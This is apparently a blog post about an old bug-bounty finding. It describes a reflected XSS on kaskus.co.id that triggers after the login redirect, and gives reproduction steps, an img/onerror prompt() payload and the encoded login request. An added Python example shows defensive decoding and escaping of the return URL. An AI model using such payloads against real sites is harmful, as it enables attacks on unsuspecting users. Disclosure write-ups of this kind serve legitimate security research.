This is an old bug I found in 2016. I am writing about it on my new blog to share what I found, because I think this bug is very interesting and unique.
Description
This bug is unique because the XSS is exposed when the user is redirected back to the previous page after login.
Steps To Reproduce
- Go to http://www.kaskus.co.id/thread/57a47e691cbfaa092b8b456a/?ref=header&med=header
- Change the parameter to "><img+src%3Dx+onerror%3Dprompt('XSS/By/LocalHost')%3B>
- Log in with the widget at the top of the page and you will be redirected
- The XSS will then be exposed
HTTP header response:
username=sebutsajanos&password=&md5password=&md5password_utf=&securitytoken=1470955602-c2079dd69c8f65d455e977727407176b&url=%252Fthread%252F57a47e691cbfaa092b8b456a%252F%253Fref%253Dheader%2526med%253D%252522%25253E%25253Cimg%252Bsrc%25253Dx%252Bonerror%25253Dprompt%2528%252527XSS%252FBy%252FLocalHost%252527%2529%25253B%25253E
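The url field in the data above carries the thread URL under several layers of percent-encoding, so the markup only becomes visible after repeated decoding. The Python below is an added example, not code from Kaskus or from the original write-up: it peels those layers and shows one way a login handler could canonicalise and escape the return target. The function names, the "/" fallback and the "Continue" link are hypothetical.

```python
import html
from urllib.parse import parse_qsl, quote, unquote, urlencode, urlsplit

# The url field from the login data captured above (extraction spaces removed).
CAPTURED_URL_FIELD = (
    "%252Fthread%252F57a47e691cbfaa092b8b456a%252F%253Fref%253Dheader%2526med%253D"
    "%252522%25253E%25253Cimg%252Bsrc%25253Dx%252Bonerror%25253Dprompt"
    "%2528%252527XSS%252FBy%252FLocalHost%252527%2529%25253B%25253E"
)

def peel(value, max_rounds=5):
    """Percent-decode repeatedly; return every layer so the nesting depth is visible."""
    layers = [value]
    for _ in range(max_rounds):
        decoded = unquote(layers[-1])
        if decoded == layers[-1]:
            break
        layers.append(decoded)
    return layers

def safe_return_url(field, fallback="/"):
    """Canonicalise a post-login return target; accept only a same-site path."""
    target = peel(field)[-1]
    if unquote(target) != target:  # still encoded after max_rounds: refuse
        return fallback
    parts = urlsplit(target)
    local = target.startswith("/") and not target.startswith("//") and "\\" not in target
    if not local or parts.scheme or parts.netloc:
        return fallback
    # Re-encode every query value exactly once so no raw markup survives.
    query = urlencode(parse_qsl(parts.query, keep_blank_values=True))
    return quote(parts.path) + ("?" + query if query else "")

def render_continue_link(field):
    """Escape for the HTML attribute context before the value reaches the page."""
    return '<a href="%s">Continue</a>' % html.escape(safe_return_url(field), quote=True)

if __name__ == "__main__":
    for depth, layer in enumerate(peel(CAPTURED_URL_FIELD)):
        print(depth, layer)
    print(render_continue_link(CAPTURED_URL_FIELD))
```

Decoding until the value is stable assumes return targets never need a literal percent sign; a handler that does need one should instead decode a fixed number of times and reject anything still encoded.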
Note:
Kaskus's response was very quick and I got swag from them.